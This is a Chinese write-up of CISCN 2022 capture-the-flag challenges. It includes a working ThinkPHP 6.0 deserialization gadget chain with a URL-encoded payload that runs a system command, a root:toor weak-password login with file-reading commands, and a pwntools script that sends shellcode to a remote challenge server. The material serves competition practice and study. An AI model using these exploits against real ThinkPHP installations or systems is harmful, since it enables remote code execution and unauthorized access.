CISCN 2022 Writeup

感觉今年的题目比去年的简单些，三道密码非预期。好朋友帮忙做了150道选择题，然后出了六道CTF题就下线划水了~

Misc

签到电台

首先根据题干，向公众号发送关键字得到 hint

打开题目环境，发现密码本，然后根据公众号的提示，7*4个数字也就是前28位

点击纯数字模式取前 28 位

1272685121234614783219665440

然后 弼时安全到达了 所对应的7个电码：

1732 2514 1344 0356 0451 6671 0055

先 get请求 启动电报机

/send?msg=s

然后 get请求 模十之后的 28 位数字

/send?msg=2904836534674960728375375495

WEB

ezpop

tp6.0 的反序列化，直接百度搜一个exp就行了（ ThinkPHP6.0反序列化链审计与分析：https://forum.butian.net/share/1168 ），我们只需要找到反序列化点，经过 dirsearch 扫描，发现存在 www.zip 文件，然后在 index.php 控制器里存在反序列化点

<?php

namespace think {

    use think\route\Url;

    abstract class Model
    {
        private $lazySave;
        private $exists;
        protected $withEvent;
        protected $table;
        private $data;
        private $force;
        public function __construct()
        {
            $this->lazySave = true;
            $this->withEvent = false;
            $this->exists = true;
            $this->table = new Url();
            $this->force = true;
            $this->data = ["1"];
        }
    }
}

namespace think\model {

    use think\Model;

    class Pivot extends Model
    {
        function __construct()
        {
            parent::__construct();
        }
    }
    $b = new Pivot();
    echo urlencode(serialize($b));
}

namespace think\route {

    use think\Middleware;
    use think\Validate;

    class Url
    {
        protected $url;
        protected $domain;
        protected $app;
        protected $route;
        public function __construct()
        {
            $this->url = 'a:';
            $this->domain = "<?php system('cat /flag.txt');?>";
            $this->app = new Middleware();
            $this->route = new Validate();
        }
    }
}

namespace think {

    use think\view\driver\Php;

    class Validate
    {
        public function __construct()
        {
            $this->type['getDomainBind'] = [new Php(), 'display'];
        }
    }
    class Middleware
    {
        public function __construct()
        {
            $this->request = "sp4c1ous";
        }
    }
}

namespace think\view\driver {
    class Php
    {
        public function __construct()  
        { 
        }
    }
}

payload

// ?s=index/test或者/index.php/index/test

a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A32%3A%22%3C%3Fphp+system%28%27cat+%2Fflag.txt%27%29%3B%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bs%3A8%3A%22sp4c1ous%22%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A4%3A%22type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3B%7D

密码

基于挑战码的双向认证 & 基于挑战码的双向认证2

ssh连上直接 find 搜索flag

find / -name 'flag*'

cat /root/cube-shell/instance/flag_server/flag*

第一个flag是 基于挑战码的双向认证 第二个是 基于挑战码的双向认证2

基于挑战码的双向认证3

非预期，账号密码：root:toor 弱口令

cat /root/cube-shell/instance/flag_server/flag*

PWN

login-nomal

定位到 main > sub_FFD（）

很明显是对 sc 的执行。

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
# p = process('./login')
p = remote('123.56.87.204', 36979)
pl = "msg:ro0tt\nopt:1\n"
p.sendlineafter(">>", pl)
key = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N000"
pl = "msg:" + key + "\nopt:2\n"
p.sendlineafter(">>", pl)
p.interactive()